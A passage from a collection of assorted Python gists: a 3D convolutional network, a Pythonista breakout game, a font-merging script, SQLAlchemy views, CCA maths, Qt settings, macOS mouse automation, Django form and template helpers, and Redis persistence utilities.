conv2 = tf.nn.relu(bias, name=scope.name)
prev_layer = conv2
in_filters = out_filters
# normalize prev_layer here
prev_layer = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
with tf.variable_scope('conv3_1') as scope:
out_filters = 64
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
with tf.variable_scope('conv3_2') as scope:
out_filters = 64
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
with tf.variable_scope('conv3_3') as scope:
out_filters = 32
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
# normalize prev_layer here
prev_layer = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
with tf.variable_scope('local3') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
prev_layer_flat = tf.reshape(prev_layer, [-1, dim])
weights = _weight_variable('weights', [dim, FC_SIZE])
biases = _bias_variable('biases', [FC_SIZE])
local3 = tf.nn.relu(tf.matmul(prev_layer_flat, weights) + biases, name=scope.name)
prev_layer = local3
with tf.variable_scope('local4') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
prev_layer_flat = tf.reshape(prev_layer, [-1, dim])
weights = _weight_variable('weights', [dim, FC_SIZE])
biases = _bias_variable('biases', [FC_SIZE])
local4 = tf.nn.relu(tf.matmul(prev_layer_flat, weights) + biases, name=scope.name)
prev_layer = local4
with tf.variable_scope('softmax_linear') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
weights = _weight_variable('weights', [dim, dataconfig.num_classes])
biases = _bias_variable('biases', [dataconfig.num_classes])
softmax_linear = tf.add(tf.matmul(prev_layer, weights), biases, name=scope.name)
return softmax_linear
def loss(logits, labels):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
logits, labels, name='cross_entropy_per_example')
return tf.reduce_mean(cross_entropy, name='xentropy_mean')
```
#### File: hard-gists/5305895/snippet.py
```python
from scene import *
from sound import play_effect
from random import randint
def centered_rect(x, y, w, h):
return Rect(x-w/2, y-h/2, w, h)
class Field(object):
def __init__(self):
size = screen_size
left = 0
bottom = 0
right = screen_size.w
top = screen_size.h
self.lines = [(left, bottom, left, top), (left, top, right, top), (right, top, right, bottom)]
def draw(self):
stroke_weight(4)
stroke(1,1,1)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 50, 100, 20)
self.lives = 3
def update(self):
self.rect.x += gravity().x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
fill(1,1,1)
rect(*self.rect)
class Ball(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 60, 20, 20)
self.vx = randint(-6, 6)
self.vy = 7
self.is_moving = False
def collide_with_paddle(self, paddle):
if self.rect.intersects(paddle.rect):
self.rect.y = paddle.rect.top()
self.vy *= -1
pos = self.rect.center().x - paddle.rect.center().x
self.vx = pos/10
play_effect('Jump_3')
def collide_with_block(self, block):
if self.rect.intersects(block.rect):
if self.rect.intersects(block.left):
self.rect.x = block.rect.left()-self.rect.w
self.vx = -abs(self.vx)
elif self.rect.intersects(block.right):
self.rect.x = block.rect.right()
self.vx = abs(self.vx)
elif self.rect.intersects(block.top):
self.rect.y = block.rect.top()
self.vy = abs(self.vy)
elif self.rect.intersects(block.bottom):
self.rect.y = block.rect.bottom()-self.rect.h
self.vy = -abs(self.vy)
return True
def update(self, dt):
self.rect.x += self.vx + dt*10
self.rect.y += self.vy + dt*10
if self.rect.right() >= screen_size.w:
self.rect.x = screen_size.w - self.rect.w
self.vx *= -1
play_effect('Jump_5')
if self.rect.left() <= 0:
self.rect.x = 0
self.vx *= -1
play_effect('Jump_5')
if self.rect.top() >= screen_size.h:
self.rect.y = screen_size.h - self.rect.w
self.vy *= -1
play_effect('Jump_5')
def draw(self):
fill(1,1,0)
no_stroke()
ellipse(*self.rect)
class Block(object):
def __init__(self, x, y, w, mode=1):
self.size = Size(w, 30)
self.rect = Rect(x, y, *self.size)
self.mode = mode
if self.mode > 1:
self.colour = (0.70, 0.70, 0.70)
else:
self.colour = (1,0,0)
top = self.rect.top()
left = self.rect.left()
right = self.rect.right()
bottom = self.rect.bottom()
self.left = Rect(left-5, bottom+5, 5, top-bottom-10)
self.right = Rect(right, bottom+5, 5, top-bottom-10)
self.bottom = Rect(left, bottom, right-left, 5)
self.top = Rect(left, top-5, right-left, 5)
def draw_sides(self):
fill(0,1,0)
rect(*self.left)
rect(*self.right)
rect(*self.top)
rect(*self.bottom)
def draw(self):
stroke_weight(1)
#no_stroke()
fill(*self.colour)
rect(*self.rect)
#self.draw_sides()
def random_level(n=7, t=13):
level = []
for i in range(n):
level.append([])
for j in range(t):
level[i].append(randint(0, 1))
return level
level = [
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],
[[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 0, 0, 2, 2, 2]],
random_level()
]
class Game(Scene):
def setup(self):
self.level = 1
self.field = Field()
self.player = Player()
self.ball = Ball()
self.blocks = []
self.spawn_blocks()
def spawn_blocks(self):
self.solid_blocks = []
if self.level > len(level):
lvl = len(level)-1
else:
lvl = self.level-1
for y in range(len(level[lvl])):
for x in range(len(level[lvl][y])):
w = screen_size.w/len(level[lvl][y])
mode = level[lvl][y][x]
if level[lvl][y][x] == 1:
self.blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
elif level[lvl][y][x] == 2:
self.solid_blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
def draw(self):
removed_blocks = set()
text('Lives: {0}'.format(self.player.lives), x=screen_size.w-45, y=screen_size.h-40)
text('Level: {0}'.format(self.level), x=45, y=screen_size.h-45)
self.field.draw()
self.player.draw()
self.player.update()
self.ball.draw()
if self.ball.is_moving:
self.ball.update(self.dt)
self.ball.collide_with_paddle(self.player)
else:
self.ball.rect.center(self.player.rect.center().x, self.player.rect.top()+10)
self.ball.line = (0, 0, 0, 0)
if self.ball.rect.top() < 0:
self.player.lives -= 1
self.ball.is_moving = False
for block in self.blocks:
block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(block):
removed_blocks.add(block)
play_effect('Hit_3')
for solid_block in self.solid_blocks:
solid_block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(solid_block):
play_effect('Ding_1')
for removed_block in removed_blocks:
self.blocks.remove(removed_block)
if len(self.blocks) == 0:
self.ball.is_moving = False
self.level += 1
self.spawn_blocks()
if self.level >= len(level):
level[-1] = random_level()
self.spawn_blocks()
if self.player.lives == 0:
main_scene.switch_scene(GameOver())
def touch_began(self, touch):
if not self.ball.is_moving:
self.ball.is_moving = True
class GameOver(Scene):
def setup(self):
self.field = Field()
self.button = Button(Rect(screen_size.w/2-100, screen_size.h/2-50, 200, 100), 'Restart')
self.button.action = self.restart
self.add_layer(self.button)
def restart(self):
main_scene.switch_scene(Game())
def draw(self):
self.field.draw()
self.button.draw()
no_tint()
text('Game Over', x=screen_size.w/2, y=screen_size.h/4*3, font_size=64)
class MultiScene(Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
run(self, PORTRAIT)
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.active_scene.add_layer = self.add_layer
self.active_scene.size = self.size
self.active_scene.bounds = self.bounds
self.active_scene.setup()
def draw(self):
background(0.00, 0.25, 0.50)
self.active_scene.touches = self.touches
self.active_scene.dt = self.dt
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(Game())
```
#### File: hard-gists/530c20924768ce180923/snippet.py
```python
import fontforge
from datetime import date
# Open Sans のあるディレクトリのパス
opensans_path = "./Open_Sans"
# M+ のあるディレクトリのパス
mplus_path = "./mplus"
# 小瑠璃フォントを生成するディレクトリのパス
# 同じディレクトリに一時ファイルも生成される
koruri_path = "./Koruri"
# フォントリスト
# Open Sans ファイル名, M+ ファイル名, 小瑠璃 ウェイト
font_list = [
("OpenSans-Light.ttf", "mplus-1p-light.ttf", "Light"),
("OpenSans-Regular.ttf", "mplus-1p-regular.ttf", "Regular"),
("OpenSans-Semibold.ttf", "mplus-1p-medium.ttf", "Semibold"),
("OpenSans-Bold.ttf", "mplus-1p-bold.ttf", "Bold"),
("OpenSans-Extrabold.ttf", "mplus-1p-heavy.ttf", "Extrabold"),
]
def main():
# バージョンを今日の日付から生成する
today = date.today()
version = "Koruri-{0}".format(today.strftime("%Y%m%d"))
for (op, mp, weight) in font_list:
op_path = "{0}/{1}".format(opensans_path, op)
mp_path = "{0}/{1}".format(mplus_path, mp)
ko_path = "{0}/Koruri-{1}.ttf".format(koruri_path, weight)
generate_koruri(op_path, mp_path, ko_path, weight, version)
def koruri_sfnt_names(weight, version):
return (
('English (US)', 'Copyright',
'''\
Koruri: Copylight (c) 2013-2014, lindwurm.
M+ 1p: Copyright (C) 2002-2014, M+ FONTS PROJECT.
Open Sans: Copyright (c) 2010-2011, Google Corporation.'''),
('English (US)', 'Family', 'Koruri {0}'.format(weight)),
('English (US)', 'SubFamily', weight),
('English (US)', 'Fullname', 'Koruri-{0}'.format(weight)),
('English (US)', 'Version', version),
('English (US)', 'PostScriptName', 'Koruri-{0}'.format(weight)),
('English (US)', 'Vendor URL', 'http://koruri.lindwurm.biz'),
('English (US)', 'Preferred Family', 'Koruri'),
('English (US)', 'Preferred Styles', weight),
('Japanese', 'Preferred Family', 'Koruri'),
('Japanese', 'Preferred Styles', weight),
)
def koruri_gasp():
return (
(8, ('antialias',)),
(13, ('antialias', 'symmetric-smoothing')),
(65535, ('gridfit', 'antialias', 'symmetric-smoothing', 'gridfit+smoothing')),
)
def generate_koruri(op_path, mp_path, ko_path, weight, version):
# M+ を開く
font = fontforge.open(mp_path)
# EMの大きさを2048に設定する
font.em = 2048
# Open Sans を開く
opfont = fontforge.open(op_path)
# Open Sans に含まれるグリフを削除する
font.selection.none()
opfont.selection.all()
for glyph in opfont.selection.byGlyphs:
if glyph.glyphname in font:
font.selection.select(("more",), glyph.glyphname)
font.clear()
# Open Sans をマージする
font.mergeFonts(op_path)
# フォント情報の設定
font.sfnt_names = koruri_sfnt_names(weight, version)
font.os2_vendor = "maud"
# Grid Fittingの設定
font.gasp = koruri_gasp()
# TTF の生成
font.generate(ko_path, '', ('short-post', 'opentype', 'PfEd-lookups'))
if __name__ == '__main__':
main()
```
#### File: hard-gists/5310037/snippet.py
```python
from operator import attrgetter
from sqlalchemy import Table, event, subquery
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.schema import DDLElement
from sqlalchemy.sql.expression import Executable, ClauseElement
from yeepa.common.util import monkey_patch
from yeepa.backend.models import DBSession, metadata, Base, read_only_metadata
# TODO: rework as per the comments on: http://www.sqlalchemy.org/trac/ticket/2690
# REFACT: override __new__ and ensure that the read_only_metadata is used
class ReflectedTable(Table):
"Never create or drop this table type, as it represents something the ORM does not manage. Also ensure that you always use the read_only_metadata for these tables."
# REFACT: would be nice if one wouldn't have to instantiate the views to make them known, but the metaclass magic still baffles me, so I'm staying away from it
# REFACT: would be nice to extract this into it's own module that we could depend on
# REFACT: make this something more akin to the table object or the declarative table, no idea how to do that though. :)
class View(object):
"""Only supports queries that have no parameters.
Use literal_column() to embedd constants as needed."""
name=None
on=None
query=None
_table=None
def __init__(self, name=None, on=None, query=None, table=None):
if name is not None:
self.name = name
if on is not None:
self.on = on
if not isinstance(self.on, tuple):
self.on = (self.on, )
if query is not None:
self.query = query
if table is not None:
self._table = table
self.register_events()
def __repr__(self):
return u"%(class_name)s(name=%(name)r, on=%(on)r, query=%(query)r)" % dict(
class_name=self.__class__.__name__,
name=self.name,
on=self.on,
query=self.query
)
def register_events(self):
for dependency in self._dependencies():
event.listen(
dependency,
'after_create',
self.create_after_all_dependencies
)
event.listen(
dependency,
"before_drop",
self.drop_before_all_dependencies
)
def _dependencies(self):
for dependency in self.on:
if isinstance(dependency, Table):
yield dependency
if hasattr(dependency, '__table__'):
yield dependency.__table__
# TODO: throw
def create_after_all_dependencies(self, *args, **kwargs):
if self.is_missing_any_dependency():
return
CreateView(self.name, self.query)(*args, **kwargs)
if self._table is not None:
self._table.dispatch.after_create(*args, **kwargs)
def drop_before_all_dependencies(self, *args, **kwargs):
if self.is_missing_any_dependency():
return
if self._table is not None:
self._table.dispatch.before_drop(*args, **kwargs)
DropView(self.name)(*args, **kwargs)
def is_missing_any_dependency(self):
dependendent_table_names = map(attrgetter('name'), self._dependencies())
inspector = Inspector.from_engine(DBSession.bind)
return not set(dependendent_table_names).issubset(inspector.get_table_names() + inspector.get_view_names())
@property
def table(self):
if self._table is None:
self._table = ReflectedTable(self.name, read_only_metadata, autoload=True)
return self._table
class CreateView(DDLElement):
def __init__(self, name, query):
self.name = name
self.selectable = query
# REFACT: try making those instance methods
@compiles(CreateView)
def visit_create_view(element, compiler, **kw):
return "\nCREATE VIEW %s\nAS\n\t%s" % (
element.name,
compiler.sql_compiler.process(element.selectable, literal_binds=True)
)
@compiles(CreateView, 'sqlite')
def visit_create_view(element, compiler, **kw):
return "\nCREATE VIEW IF NOT EXISTS %s\nAS\n\t%s" % (
element.name,
compiler.sql_compiler.process(element.selectable, literal_binds=True)
)
class DropView(DDLElement):
def __init__(self, name):
self.name = name
@compiles(DropView)
def visit_drop_view(element, compiler, **kw):
return "\nDROP VIEW %s" % (element.name)
@compiles(DropView, 'sqlite')
def visit_drop_view(element, compiler, **kw):
return "\nDROP VIEW IF EXISTS %s" % (element.name)
```
#### File: hard-gists/5329310/snippet.py
```python
import numpy as np
import scipy as sp
from scipy import linalg as LA
from scipy.spatial import distance as DIST
def cca(X, Y):
'''
正準相関分析
http://en.wikipedia.org/wiki/Canonical_correlation
'''
n, p = X.shape
n, q = Y.shape
# zero mean
X = X - X.mean(axis=0)
Y = Y - Y.mean(axis=0)
# covariances
S = np.cov(X.T, Y.T, bias=1)
# S = np.corrcoef(X.T, Y.T)
SXX = S[:p,:p]
SYY = S[p:,p:]
SXY = S[:p,p:]
SYX = S[p:,:p]
#
sqx = LA.sqrtm(LA.inv(SXX)) # SXX^(-1/2)
sqy = LA.sqrtm(LA.inv(SYY)) # SYY^(-1/2)
M = np.dot(np.dot(sqx, SXY), sqy.T) # SXX^(-1/2) * SXY * SYY^(-T/2)
A, s, Bh = LA.svd(M, full_matrices=False)
B = Bh.T
U = np.dot(np.dot(A.T, sqx), X.T).T
V = np.dot(np.dot(B.T, sqy), Y.T).T
return s, A, B, U, V
def gaussian_kernel(x, y, var=1.0):
return np.exp(-np.linalg.norm(x - y) ** 2 / (2 * var))
def polynomial_kernel(x, y, c=1.0, d=2.0):
return (np.dot(x, y) + c) ** d
def kcca(X, Y, kernel_x=gaussian_kernel, kernel_y=gaussian_kernel, eta=1.0):
'''
カーネル正準相関分析
http://staff.aist.go.jp/s.akaho/papers/ibis00.pdf
'''
n, p = X.shape
n, q = Y.shape
Kx = DIST.squareform(DIST.pdist(X, kernel_x))
Ky = DIST.squareform(DIST.pdist(Y, kernel_y))
J = np.eye(n) - np.ones((n, n)) / n
M = np.dot(np.dot(Kx.T, J), Ky) / n
L = np.dot(np.dot(Kx.T, J), Kx) / n + eta * Kx
N = np.dot(np.dot(Ky.T, J), Ky) / n + eta * Ky
sqx = LA.sqrtm(LA.inv(L))
sqy = LA.sqrtm(LA.inv(N))
a = np.dot(np.dot(sqx, M), sqy.T)
A, s, Bh = LA.svd(a, full_matrices=False)
B = Bh.T
# U = np.dot(np.dot(A.T, sqx), X).T
# V = np.dot(np.dot(B.T, sqy), Y).T
return s, A, B
def get_data_1():
X = np.array([[2,1],[1,2],[0,0],[-1,-2],[-2,-1]])
Y = np.array([[2,2],[-1,-1],[0,0],[-2,1],[1,-2]])
return X, Y
def get_data_2():
n = 100
theta = (np.random.rand(n) - 0.5) * np.pi
x1 = np.sin(theta)
x2 = np.sin(3 * theta)
X = np.vstack([x1, x2]).T + np.random.randn(n, 2) * .05
y1 = np.exp(theta) * np.cos(2 * theta)
y2 = np.exp(theta) * np.sin(2 * theta)
Y = np.vstack([y1, y2]).T + np.random.randn(n, 2) * .05
return X, Y
def test_cca():
X, Y = get_data_1()
cca(X, Y)
X, Y = get_data_2()
cca(X, Y)
def test_kcca():
X, Y = get_data_1()
kcca(X, Y)
X, Y = get_data_2()
kcca(X, Y)
if __name__ == '__main__':
test_cca()
test_kcca()
```
#### File: hard-gists/5330231/snippet.py
```python
from PySide.QtCore import QSettings
class WindowSettable(object):
'''
Mixin behavior for MainWindow: window attributes persist as Settings
See Qt Application Example, where these are called readSettings() and writeSettings().
Assert that QSettings have been established on app startup:
QCoreApplication.setOrganizationName("Foo")
QCoreApplication.setOrganizationDomain("foo.com")
QCoreApplication.setApplicationName("Bar")
'''
def _readAndApplyWindowAttributeSettings(self):
'''
Read window attributes from settings,
using current attributes as defaults (if settings not exist.)
Called at QMainWindow initialization, before show().
'''
qsettings = QSettings()
qsettings.beginGroup( "mainWindow" )
# No need for toPoint, etc. : PySide converts types
self.restoreGeometry(qsettings.value( "geometry", self.saveGeometry()))
self.restoreState(qsettings.value( "saveState", self.saveState()))
self.move(qsettings.value( "pos", self.pos()))
self.resize(qsettings.value( "size", self.size()))
if qsettings.value( "maximized", self.isMaximized()) :
self.showMaximized()
qsettings.endGroup()
def _writeWindowAttributeSettings(self):
'''
Save window attributes as settings.
Called when window moved, resized, or closed.
'''
qsettings = QSettings()
qsettings.beginGroup( "mainWindow" )
qsettings.setValue( "geometry", self.saveGeometry() )
qsettings.setValue( "saveState", self.saveState() )
qsettings.setValue( "maximized", self.isMaximized() )
if not self.isMaximized() == True :
qsettings.setValue( "pos", self.pos() )
qsettings.setValue( "size", self.size() )
qsettings.endGroup()
```
#### File: hard-gists/5330566/snippet.py
```python
import sys
import time
from Quartz.CoreGraphics import * # imports all of the top-level symbols in the module
class AppleMouseEvents():
"""
with thanks to:
TonyT http://hints.macworld.com/article.php?story=2008051406323031
example:
m = AppleMouseEvents()
pos = m.currentPos()
m.mousedrag(pos.x,pos.y+float('30'))
"""
def __init__(self):
self.relative = True
def mouseEvent(self,type, posx, posy):
theEvent = CGEventCreateMouseEvent(None, type, (posx,posy), kCGMouseButtonLeft)
CGEventPost(kCGHIDEventTap, theEvent)
def mousemove(self,posx,posy):
self.mouseEvent(kCGEventMouseMoved, posx,posy);
def mouseclickdn(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseDown, posx,posy);
def mouseclickup(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseUp, posx,posy);
def mousedrag(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseDragged, posx,posy);
def mouserclick(self,posx,posy):
self.mouseEvent(kCGEventRightMouseDown, posx,posy);
self.mouseEvent(kCGEventRightMouseUp, posx,posy);
def mousesingleclick(self,posx,posy):
self.mouseclickdn(posx,posy)
self.mouseclickup(posx,posy)
def mousedblclick(self,posx,posy):
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
def mousetrplclick(self,posx,posy):
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
def currentPos(self):
ourEvent = CGEventCreate(None);
return CGEventGetLocation(ourEvent); # Save current mouse position
class AppleKeyboardEvents():
def __init__(self):
self.relative = True
class AppleWindowEvents():
def __init__(self):
self.relative = True
```
#### File: hard-gists/5344084/snippet.py
```python
from functools import partial
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.edit import ProcessFormView, FormMixin
class MultipleFormsMixin(FormMixin):
"""
A mixin that provides a way to show and handle several forms in a
request. Forms are provided in the class attribute *form_classes* which
provides a mapping of form names to form classes. The form name is used
as identifier and automatically put into the context when calling
``get_context_data``.
Providing keyword arguments for the forms uses ``get_form_kwargs`` by
default for every form class. For convenience, adding specific keywords
to an individiual form is also possible by calling the
``get_<form_key>_kwargs``, e.g. for a form class with key *basket_form*,
you would call ``get_basket_form_kwargs``.
It is also easy to get an individual form instance by calling either
``get_form`` with the *key* as argument or the corresponding
``get_basket_form()`` method for convenience. To prevent instantiating
the forms multiple times throughout the request cycle, the form instances
are cached on the instance. If ``get_form`` is called and the instance
are not populated, yet, all forms are instantiated and cached before
returning the requested form instance.
"""
form_classes = {} # set the form classes as a mapping
# we are caching instatiated forms here to make sure that we can get
# individual instances from forms easier and don't have to worry about
# instantiating them multiple times through out the course of a
# request cycle.
_cached_forms = {}
def get_form_classes(self):
return self.form_classes
def get_forms(self, form_classes):
if self._cached_forms:
return self._cached_forms
self._cached_forms = {}
for key, form_class in form_classes.items():
kwargs = getattr(self, 'get_{0}_kwargs'.format(key),
self.get_form_kwargs)()
self._cached_forms[key] = form_class(**kwargs)
return self._cached_forms
def __getattr__(self, name):
form_key = name.replace('get_', '')
if form_key in self.form_classes:
return partial(self.get_form, form_key)
return super(MultipleFormsMixin, self).__getattr__(name)
def get_form(self, key):
if not self._cached_forms:
self.get_forms(self.form_classes)
return self._cached_forms[key]
def get_context_data(self, **kwargs):
kwargs = super(MultipleFormsMixin, self).get_context_data(**kwargs)
kwargs.update(self._cached_forms)
return kwargs
def forms_valid(self, forms):
return super(MultipleFormsMixin, self).form_valid(forms)
def forms_invalid(self, forms):
return self.render_to_response(self.get_context_data(forms=forms))
class ProcessMultipleFormsView(ProcessFormView):
"""
A mixin that processes multiple forms on POST. Every form must be
valid.
"""
validation_results = {}
def validate_forms(self, forms):
"""
Validate forms against each other in here. This should return a
dictionary of validation result with *form_key* and validation result.
"""
return {}
def is_form_valid(self, form_key):
"""
Get the validation result for the given *form_key*. This requires the
validation to be run previously.
"""
return self.validation_results.get(form_key)
def check_forms_are_valid(self, forms):
self.validation_results = {}
for form_key, form in forms.items():
self.validation_results[form_key] = form.is_valid()
# allow for cross-form validation and update the validation resuts
self.validation_results.update(self.validate_forms(forms))
return all(self.validation_results.values())
def get(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
forms = self.get_forms(form_classes)
return self.render_to_response(self.get_context_data(forms=forms))
def post(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
forms = self.get_forms(form_classes)
if self.check_forms_are_valid(forms):
return self.forms_valid(forms)
else:
return self.forms_invalid(forms)
class BaseMultipleFormsView(MultipleFormsMixin, ProcessMultipleFormsView):
"""
A base view for displaying several forms.
"""
class MultipleFormsView(TemplateResponseMixin, BaseMultipleFormsView):
"""
A view for displaing several forms, and rendering a template response.
"""
```
#### File: hard-gists/5352608/snippet.py
```python
from apscheduler.scheduler import Scheduler
import datetime as dt
sched = Scheduler()
sched.start()
def timeout(job_fn, *fn_args, **delta_args):
"""Like setTimeout in javascript; returns a job object
First argument is the function to be called.
Positional arguments will be passed to the function when it's called.
Keyword arguemnts will be passed to datetime.timedelta
Usage:
# calls `fn()` after 3 seconds
timeout(fn, seconds=3)
# calls `fn(foo, bar)` after 10 seconds
timeout(fn, foor, bar, seconds=10)
"""
time = dt.datetime.now() + dt.timedelta(**delta_args)
return sched.add_date_job(job_fn, time, fn_args)
# Example usage:
def hello_spam(name):
print "Hello {0}".format(name)
timeout(hello_spam, name, seconds=1)
hello_spam("Dude")
import time
time.sleep(15)
```
#### File: hard-gists/5358040/snippet.py
```python
from django import template
register = template.Library()
@register.simple_tag
def format_date_range(date_from, date_to, separator=" - ",
format_str="%B %d, %Y", year_f=", %Y", month_f="%B", date_f=" %d"):
""" Takes a start date, end date, separator and formatting strings and
returns a pretty date range string
"""
if (date_to and date_to != date_from):
from_format = to_format = format_str
if (date_from.year == date_to.year):
from_format = from_format.replace(year_f, '')
if (date_from.month == date_to.month):
to_format = to_format.replace(month_f, '')
return separator.join((date_from.strftime(from_format), date_to.strftime(to_format)))
else:
return date_from.strftime(format_str)
```
#### File: hard-gists/5380169/snippet.py
```python
import random, scene
sizeInPixels = 100
def rectFromPt(inPoint): # returns a scene.Rect centered on inPoint
half = sizeInPixels / 2
return scene.Rect(inPoint.x - half, inPoint.y - half, sizeInPixels, sizeInPixels)
class ImageLayer(scene.Layer):
def __init__(self, inCenter, inImage):
super(self.__class__, self).__init__(rectFromPt(inCenter))
self.image = inImage
class MyScene(scene.Scene):
def __init__(self):
scene.run(self) # a self running scene
def setup(self):
#centerOfScreen = self.bounds.center()
thePoint = scene.Point(10 + sizeInPixels / 2, 10 + sizeInPixels / 2)
images = 'Rabbit_Face Mouse_Face Cat_Face Dog_Face Octopus Bear_Face Chicken Cow_Face'
images = images.split()
for image in images:
scene.load_image(image)
images *= 2 # go from 8 images to 16
random.shuffle(images)
for image in images:
self.add_layer(ImageLayer(thePoint, image))
thePoint.x += 10 + sizeInPixels / 3
thePoint.y = thePoint.x
self.touchedLayer = None
def draw(self):
scene.background(0, 0, 0)
self.root_layer.update(self.dt)
self.root_layer.draw()
def touch_began(self, touch):
if touch.layer != self.root_layer:
self.touchedLayer = touch.layer
def touch_moved(self, touch):
if self.touchedLayer:
self.touchedLayer.frame = rectFromPt(touch.location)
def touch_ended(self, touch):
self.touchedLayer = None
MyScene() # a self running scene
```
#### File: hard-gists/5400853/snippet.py
```python
import nuke
def duplicate_node(node, to_file = None):
"""Slightly convoluted but reliable(?) way duplicate a node, using
the same functionality as the regular copy and paste.
Could almost be done tidily by doing:
for knobname in src_node.knobs():
value = src_node[knobname].toScript()
new_node[knobname].fromScript(value)
..but this lacks some subtly like handling custom knobs
to_file can be set to a string, and the node will be written to a
file instead of duplicated in the tree
"""
# Store selection
orig_selection = nuke.selectedNodes()
# Select only the target node
[n.setSelected(False) for n in nuke.selectedNodes()]
node.setSelected(True)
# If writing to a file, do that, restore the selection and return
if to_file is not None:
nuke.nodeCopy(to_file)
[n.setSelected(False) for n in orig_selection]
return
# Copy the selected node and clear selection again
nuke.nodeCopy("%clipboard%")
node.setSelected(False)
if to_file is None:
# If not writing to a file, call paste function, and the new node
# becomes the selected
nuke.nodePaste("%clipboard%")
new_node = nuke.selectedNode()
# Restore original selection
[n.setSelected(False) for n in nuke.selectedNodes()] # Deselect all
[n.setSelected(True) for n in orig_selection] # Select originally selected
return new_node
```
#### File: hard-gists/540687/snippet.py
```python
import jsonpickle
import domain
"""
Based on the premise that any object can be identified by its class name and
a the value of a unique attribute (primary key) which is here reffered to as the identity
"""
def make_attribute_key(obj,attribute):
"""
Returns a key for a given attribute/property of an object
"""
basic_key = _make_basic_key(obj.__class__.__name__, obj.get_identity())
return basic_key + attribute
def exists(db, class_name, identity):
"""
Checks if a specific object exists in the redis store
"""
result_keys = keys(db,class_name, identity)
return True if len(result_keys) else False
def keys(db, class_name, identity):
"""
Returns all keys for a given object
"""
pattern = _make_key_pattern(class_name, identity)
return db.keys(pattern)
def set(db, k, v):
db.set(k,jsonpickle.encode(v))
def get(db,k):
return jsonpickle.decode(db.get(k))
def mset(db, kv_dict):
for k,v in kv_dict.iteritems():
kv_dict[k] = jsonpickle.encode(v)
db.mset(kv_dict)
def mget(db, keys):
return [jsonpickle.decode(each) for each in db.mget(keys)]
def save(db, obj):
mset(db, _make_pairs(obj))
def multisave(db, objs):
